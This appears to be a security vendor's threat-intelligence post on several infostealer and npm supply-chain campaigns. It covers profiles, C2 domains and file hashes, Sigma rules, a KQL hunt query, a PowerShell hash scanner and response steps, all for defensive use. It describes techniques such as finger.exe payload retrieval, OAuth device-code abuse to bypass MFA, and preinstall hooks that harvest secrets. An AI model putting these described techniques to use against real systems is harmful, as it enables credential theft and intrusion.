Back to Intelligence

ClickFix, LofyStealer & JINX-0164: Multi-Vector Infostealer & Supply Chain Assault — OTX Pulse Analysis

SA
Security Arsenal Team
June 3, 2026
5 min read

Recent OTX pulses indicate a coordinated surge in credential theft operations leveraging diverse attack vectors. Threat actors are utilizing social engineering (ClickFix, LofyStealer), supply chain compromise (Shai-Hulud, JINX-0164), and protocol abuse (Kali365) to infiltrate environments. The primary objective across these campaigns is the theft of session tokens, cloud credentials (AWS, Azure, GCP), cryptocurrency wallets, and browser data. Notably, there is a distinct shift towards targeting developers via compromised NPM packages and LinkedIn-based recruitment scams, alongside broad PhaaS (Phishing-as-a-Service) operations targeting enterprise SaaS platforms.

Threat Actor / Malware Profile

LofyStealer (LofyGang)

  • Distribution: Social engineering targeting Minecraft players.
  • Payload: Two-stage malware; 53.5MB Node.js loader dropping a 1.4MB native C++ payload.
  • Behavior: Executes directly in memory to evade disk-based scanning. Steals cookies, passwords, tokens, and banking details from 8+ browsers.
  • Anti-Analysis: Uses syscall evasion techniques within the Node.js loader.

ClickFix (BackgroundFix)

  • Distribution: Fake image-editing tool lures.
  • Payload: Delivers CastleLoader, which drops NetSupport RAT and CastleStealer (.NET).
  • Behavior: Uses clipboard hijacking to copy malicious commands invoking finger.exe for payload retrieval.
  • Persistence: NetSupport RAT establishes persistent C2 channels.

JINX-0164

  • Distribution: LinkedIn social engineering posing as recruiters; NPM trojan packages.
  • Payload: Custom macOS malware (AUDIOFIX - Python/Go) and MINIRAT.
  • Behavior: Harvests developer secrets and cryptocurrency credentials.

Kali365 Operator

  • Distribution: Phishing-as-a-Service (PhaaS) platforms.
  • Payload: EKZ Infostealer.
  • Behavior: Abuses OAuth 2.0 Device Authorization Flow to bypass MFA and steal authentication tokens for Microsoft 365, Okta, and AWS.

Shai-Hulud (Mini Shai-Hulud)

  • Distribution: Compromised @redhat-cloud-services npm packages.
  • Payload: TrapDoor and AES-GCM encrypted JavaScript loaders.
  • Behavior: Executes via preinstall hooks to harvest CI/CD secrets, SSH keys, and cloud credentials.

IOC Analysis

The provided IOCs consist of high-fidelity indicators across multiple categories:

  • Domains: C2 infrastructure such as trindastal.com (ClickFix), securehubcloud.com (Kali365), and driver-updater.net (JINX-0164). These should be immediately blocked on DNS proxies and firewalls.
  • File Hashes: SHA256 and MD5 hashes for loaders (Node.js, CastleLoader) and payloads (NetSupport RAT, LofyStealer). These are critical for EDR correlation and retrospective hunting.
  • URLs: Specific script endpoints (e.g., /install.sh on port 80/443 or non-standard ports like :688).

SOC teams should operationalize these by uploading the hash list to EDR solutions (CrowdStrike, SentinelOne, MDE) and creating firewall block lists for the domains.

Detection Engineering

YAML
---
title: Potential ClickFix BackgroundFix Activity
id: a4b2c1d3-5566-7788-99aa-bbccddeeff00
description: Detects the execution of finger.exe invoked via command line or clipboard manipulation, a tactic used by ClickFix campaigns to retrieve payloads.
status: experimental
date: 2026/06/03
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/667d2a3f55b8f6e3b2c1d3e4
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\finger.exe'
    condition: selection
falsepositives:
    - Legitimate administrative use of finger.exe (rare)
level: high
---
title: Suspicious Node.js Child Process (LofyStealer)
id: b5c3d2e4-6677-8899-00bb-ccddeeff0011
description: Detects Node.js spawning PowerShell or cmd.exe, indicative of the LofyStealer Node.js loader executing subsequent payloads.
status: experimental
date: 2026/06/03
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/667d2a3f55b8f6e3b2c1d3e5
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    parent:
        Image|endswith: '\node.exe'
    child:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
    condition: parent and child
falsepositives:
    - Legitimate developer build scripts
level: medium
---
title: NPM Supply Chain Preinstall Hook Execution
id: c6d4e3f5-7788-9900-11cc-ddeeff001122
description: Detects the execution of shell commands or scripts during the npm install preinstall phase, indicative of supply chain attacks like Shai-Hulud.
status: experimental
date: 2026/06/03
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/667d2a3f55b8f6e3b2c1d3e6
tags:
    - attack.initial_access
    - attack.t1195.002
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        ParentImage|endswith: '/node'
        CommandLine|contains:
            - 'preinstall'
            - 'install.sh'
        Image|endswith:
            - '/sh'
            - '/bash'
            - '/node'
    condition: selection
falsepositives:
    - Legitimate package installation scripts
level: high


kql
// Hunt for network connections to known C2 domains and suspicious ports
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("trindastal.com", "poronto.com", "brionter.com", "giovettiadv.com", "securehubcloud.com", "driver-updater.net", "live.ong")
    or RemotePort in (688, 8080, 4443)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemotePort, RemoteIP
| extend IoCType = iif(RemoteUrl has_any ("trindastal.com", "poronto.com"), "ClickFix C2", iif(RemoteUrl has "securehubcloud", "Kali365 Panel", "Suspicious Domain"))


powershell
# IOC Hunt Script for ClickFix and LofyStealer Hashes
$targetHashes = @(
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92",
    "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9",
    "f5dbaa09e60343f252a80d4a313a36ac11442d96b0896022d1a83744e3c11feb",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7",
    "0dc06ecdaa63fe24859cfd955053c23245c536e4733480239d14bebf12688e35",
    "21b6409a7b84446310daca5409ad6112ac60a1e4bef97736e53fff5f63bfdef4"
)

Write-Host "[+] Scanning for malicious file hashes..."

$drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($hash in $targetHashes) {
    foreach ($drive in $drives) {
        Write-Host "[INFO] Checking drive $drive for hash $hash"
        Get-ChildItem -Path $drive -Recurse -ErrorAction SilentlyContinue | Get-FileHash -Algorithm SHA256 -ErrorAction SilentlyContinue | Where-Object { $_.Hash -eq $hash } | ForEach-Object {
            Write-Host "[ALERT] Malicious file found: $($_.Path)" -ForegroundColor Red
        }
    }
}

# Check for finger.exe execution logs via PowerShell Script Block Logging
Write-Host "[+] Checking Script Block Logs for finger.exe invocation..."
Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational -MaxEvents 1000 -ErrorAction SilentlyContinue | Where-Object { $_.Message -match 'finger.exe' } | Select-Object TimeCreated, Message | Format-List

Response Priorities

Immediate (0-24h)

  • Block all listed domains and URLs on perimeter firewalls and DNS resolvers.
  • Run the PowerShell IOC hunt script on all endpoints to identify dropped payloads.
  • Isolate any devices exhibiting finger.exe spawning or suspicious Node.js child processes.

24-48h

  • Identity Verification: If credential theft is suspected (LofyStealer, Kali365, Shai-Hulud), force reset passwords and invalidate session tokens for impacted users and service accounts.
  • Audit OAuth Logs: Review Azure AD/Okta logs for "Device Code Flow" logins from unusual locations (Kali365 detection).

1 Week

  • Architecture Hardening: Implement package-lock validation for NPM and enforce dependency review policies to mitigate supply chain risks.
  • MFA Hardening: Conditional Access policies to block or require additional authentication for Device Code Flow logins.
  • Developer Hygiene: Mandate the use of non-admin accounts for development work and segregate build environments from production credential access.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealersupply-chainoauth-phishinglofystealernpm-malware

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action